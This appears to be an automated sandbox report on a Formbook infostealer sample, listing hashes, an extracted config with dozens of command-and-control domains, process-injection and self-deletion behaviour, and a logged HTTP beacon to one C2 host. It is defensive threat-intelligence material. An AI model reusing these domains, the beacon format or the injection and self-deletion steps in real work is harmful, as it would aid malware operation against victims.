Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 04:52
Static task
static1
Behavioral task
behavioral1
Sample
skmbt ref 10072022.exe
Resource
win7-20240903-en
General
-
Target
skmbt ref 10072022.exe
-
Size
933KB
-
MD5
dc681c0d1b1a68760efaa3d0e30c265c
-
SHA1
b9af8e985e07a8ca11a5b81e7353428015c824ad
-
SHA256
866ff728d933b6a13b260cb79be66e9d17069f15fb7458673d313f6d7590864a
-
SHA512
fb1b39aba32987f6a84617870e5b3cfc9a6c54726979ad9608082b78135d91a35fd4c4ae7bd63f90c35e51d138c9d7952d93daef9ebc62f4dcbb880fd23d5de2
-
SSDEEP
12288:wGrI2iNQxZU/LPBBmJw5afc8WBuSSVwwuizH+BllvMo3Y6J2u:wGs1gUjPBwwIWcSSSeze3d3Q
Malware Config
Extracted
formbook
4.1
a1n9
mundodasmaquininhas.net
smop2.info
xn--chriemonrve-cbbu.com
kalebet977.com
inmobiliarianb.com
watersmartaz.com
xyz.gallery
sadiztech.com
traiteur-albi.fr
blocks.icu
hangrypancreas.com
saysosoulcards.com
rightforearth.com
swifty.network
bettwsrfc.co.uk
bcausemarketing.com
thaibjbar.com
zurisfashion.store
optimisescreencleaner.com
couponsjoe.com
obatsakitkanker.com
steelandcements.com
genitorisicresce.com
wwwhx951.com
kalaimani.com
wholesaleknafeh.com
house-pr.com
cameronrusticdesign.com
guiadadieta.com
italianfeetjob.com
popupdocs.net
costretch4life.com
zwnvgz.com
athlete-exchange.net
interactspeechanddrama.com
corstorphinett.club
fearofmovingforward.com
thinkbracknell.com
haberindibi.com
liamx.com
guoranspace.net
lindaedwards-music.com
recurringrevenue.online
lfxindi.com
top-of-taxi.com
domagojvida.com
joulesjordan.com
cashflowsmoothing.com
masteren-marketing-digital1.com
quoternion.com
shedsofslidell.com
jfdxpctb.net
dropmwe.online
stay2stay.com
babymoko.com
medianalyst.com
mottiinvestments.com
ppctrends.com
cemepeng.com
villainmanikata.com
servibracional.com
listgi.com
oinknoodle.com
coms-en.icu
mireolife.com
Signatures
-
Formbook family
-
Formbook payload 3 IoCs
resource yara_rule behavioral2/memory/4032-14-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/4032-19-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/3560-24-0x0000000000350000-0x000000000037F000-memory.dmp formbook -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2380 set thread context of 4032 2380 skmbt ref 10072022.exe 101 PID 4032 set thread context of 3508 4032 skmbt ref 10072022.exe 56 PID 3560 set thread context of 3508 3560 wscript.exe 56 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skmbt ref 10072022.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 2380 skmbt ref 10072022.exe 2380 skmbt ref 10072022.exe 2380 skmbt ref 10072022.exe 2380 skmbt ref 10072022.exe 4032 skmbt ref 10072022.exe 4032 skmbt ref 10072022.exe 4032 skmbt ref 10072022.exe 4032 skmbt ref 10072022.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe 3560 wscript.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 4032 skmbt ref 10072022.exe 4032 skmbt ref 10072022.exe 4032 skmbt ref 10072022.exe 3560 wscript.exe 3560 wscript.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2380 skmbt ref 10072022.exe Token: SeDebugPrivilege 4032 skmbt ref 10072022.exe Token: SeDebugPrivilege 3560 wscript.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2380 wrote to memory of 1768 2380 skmbt ref 10072022.exe 99 PID 2380 wrote to memory of 1768 2380 skmbt ref 10072022.exe 99 PID 2380 wrote to memory of 1768 2380 skmbt ref 10072022.exe 99 PID 2380 wrote to memory of 4396 2380 skmbt ref 10072022.exe 100 PID 2380 wrote to memory of 4396 2380 skmbt ref 10072022.exe 100 PID 2380 wrote to memory of 4396 2380 skmbt ref 10072022.exe 100 PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101 PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101 PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101 PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101 PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101 PID 2380 wrote to memory of 4032 2380 skmbt ref 10072022.exe 101 PID 3508 wrote to memory of 3560 3508 Explorer.EXE 102 PID 3508 wrote to memory of 3560 3508 Explorer.EXE 102 PID 3508 wrote to memory of 3560 3508 Explorer.EXE 102 PID 3560 wrote to memory of 4348 3560 wscript.exe 103 PID 3560 wrote to memory of 4348 3560 wscript.exe 103 PID 3560 wrote to memory of 4348 3560 wscript.exe 103
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"3⤵PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"3⤵PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\skmbt ref 10072022.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4348
-
-
Network
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request23.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.42.69.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request24.139.73.23.in-addr.arpaIN PTRResponse24.139.73.23.in-addr.arpaIN PTRa23-73-139-24deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request83.210.23.2.in-addr.arpaIN PTRResponse83.210.23.2.in-addr.arpaIN PTRa2-23-210-83deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.joulesjordan.comIN AResponse
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.wwwhx951.comIN AResponse
-
Remote address:8.8.8.8:53Requestwww.blocks.icuIN AResponsewww.blocks.icuIN CNAMEblocks.icublocks.icuIN A192.0.78.25blocks.icuIN A192.0.78.24
-
GEThttp://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6QExplorer.EXERemote address:192.0.78.25:80RequestGET /a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q HTTP/1.1
Host: www.blocks.icu
Connection: close
ResponseHTTP/1.1 301 Moved Permanently
Date: Sun, 22 Dec 2024 04:54:55 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6Q
X-ac: 3.lhr _dfw BYPASS
Alt-Svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request25.78.0.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.jfdxpctb.netIN AResponse
-
192.0.78.25:80http://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6QhttpExplorer.EXE394 B 713 B 5 5
HTTP Request
GET http://www.blocks.icu/a1n9/?hdmTv2MX=VnfuStwuEFmDOSc+Yd/5Q+XOchp2W1FFazlMVPqdlvFAXbFBI8/JuiFRMb1cq8/I2Qeh&BPJdfv=YV8tz6QHTTP Response
301
-
72 B 158 B 1 1
DNS Request
241.150.49.20.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
22.49.80.91.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
23.159.190.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
232.168.11.51.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
24.139.73.23.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
83.210.23.2.in-addr.arpa
-
66 B 139 B 1 1
DNS Request
www.joulesjordan.com
-
72 B 158 B 1 1
DNS Request
19.229.111.52.in-addr.arpa
-
62 B 135 B 1 1
DNS Request
www.wwwhx951.com
-
60 B 106 B 1 1
DNS Request
www.blocks.icu
DNS Response
192.0.78.25192.0.78.24
-
70 B 135 B 1 1
DNS Request
25.78.0.192.in-addr.arpa
-
62 B 135 B 1 1
DNS Request
www.jfdxpctb.net